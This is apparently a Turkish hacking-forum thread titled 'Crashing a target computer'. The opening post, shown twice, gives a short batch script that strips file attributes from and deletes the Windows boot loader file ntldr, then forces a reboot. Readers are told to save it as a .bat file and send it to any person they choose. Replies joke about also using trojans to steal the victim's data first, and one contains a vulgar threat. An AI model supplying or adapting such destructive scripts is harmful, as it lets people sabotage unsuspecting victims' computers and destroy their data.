Hedef Bilgisayarı Çökertme !!!

Arkadaşlar Çökerttiğiniz bilgisayrlar hakkında hiçbir şekilde sorumlluluk almamaktayız !!! Pc Çökertme Kodu Arkadaşlar bu kodları not defterine yapıştırıp farklı kaydetten...

Arkadaşlar Çökerttiğiniz bilgisayrlar hakkında hiçbir şekilde sorumlluluk almamaktayız !!!

Pc Çökertme Kodu
Arkadaşlar bu kodları not defterine
yapıştırıp farklı kaydetten kaydaderken .Bat
dosyasına çevirin Ve istedğiniz kişiye mesaj olarak
yollayın
Not: ASLA VE ASLA BAT DOSYASINI KENDİNİZ
AÇMAYIN SORUMLULUK BANA AİT DEĞİLDİR
KodLar:
KOD: BU KOD VİRUS YAPARAK ÇÖKERTİR
cd..
cd..
attrib -s -h -r -a c:\ntldr
del c:\ntldr
shutdown -r

💬 SpyHackerz Telegram — Anlık tartışmalar ve duyurular için katıl
Arkadaşlar Çökerttiğiniz bilgisayrlar hakkında hiçbir şekilde sorumlluluk almamaktayız !!!

Pc Çökertme Kodu
Arkadaşlar bu kodları not defterine
yapıştırıp farklı kaydetten kaydaderken .Bat
dosyasına çevirin Ve istedğiniz kişiye mesaj olarak
yollayın
Not: ASLA VE ASLA BAT DOSYASINI KENDİNİZ
AÇMAYIN SORUMLULUK BANA AİT DEĞİLDİR
KodLar:
KOD: BU KOD VİRUS YAPARAK ÇÖKERTİR
cd..
cd..
attrib -s -h -r -a c:\ntldr
del c:\ntldr
shutdown -r
aga bat dosyasını açan exe de açar ne uğraşıyon bas trojanı :)

yok bro trojan fazla iş görmez bunu atınca adamın sistemindeki önemli veriler siliniyo şöyle düşün ben senin iki bacaklarını alırsam futbol oynayabılırmısın yada yuruyebılırmısın buda futbol oynayamamalarını sağlıyo çee :)

Tolank1 haklı kitle bu konuyu bidahaki konumda adamın pc sine sızıp şemame açmayı gösterecem çee

yok bro trojan fazla iş görmez bunu atınca adamın sistemindeki önemli veriler siliniyo şöyle düşün ben senin iki bacaklarını alırsam futbol oynayabılırmısın yada yuruyebılırmısın buda futbol oynayamamalarını sağlıyo çee :)

Trojanla da silebilirsin o verileri. At trojanı al önemli verileri çek fotosunu sonra çalıştır bu batı sonuç aynı :D

Ya MoruQ yok turujan mış yok at virusuymuş amk bak ben size hek yapmayı öğretiyim ilk önce bilgisayarı kullanana bayan nicki ile gitceksin adres alıp evine gidip anasını s*kceksin sonra pc yi camdan atıp gelceksin moruQ işte bu kadar yok turujan mış yok keyloger miş :)

132,598Konular
3,282,597Mesajlar
317,797Kullanıcılar
673rbSon Üye
Üst Alt